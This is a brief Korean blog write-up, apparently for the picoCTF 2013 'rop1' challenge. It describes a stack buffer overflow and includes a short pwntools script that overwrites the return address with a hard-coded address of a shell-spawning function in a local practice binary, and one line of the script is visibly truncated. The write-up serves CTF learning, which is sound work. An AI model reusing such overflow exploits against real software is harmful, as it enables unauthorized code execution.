[pico CTF 2013] rop1

2018. 8. 15. 22:17CTF's Write-up

pico ctf rop1번 문제입니다.


pico rop1


checksec 하고!




바이너리까보면 취약한 함수라고 손수 알려주는군요 ㅎㅎ

88만큼받는데 무려..100을 ㅎㅎ BOF



어떻게 rop를 만들까 생각해보니까 마침 부르지말라는 곳에 shell호출하는 함수가 있네요! :)





그냥 exploit하죠!!


1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
from pwn import *
 
 
= process("./pico_rop1")
system = 0x080484A4
 
 
payload = ""
 
 
 
 
payload += "A"*140
payload += p32(system)
 
r.send(payload)
r.interactive()
 
 
cs


(grin)




'CTF's Write-up' 카테고리의 다른 글

[pico CTF 2013] rop2  (0) 2018.08.16
[TJCTF2018] - Cookie monster  (0) 2018.08.16
[TJCTF2018] - Weird Logo  (0) 2018.08.15
[plaid CTF] ropasaurusrex  (5) 2018.08.14
[TJCTF 2018] - Trippy  (0) 2018.08.14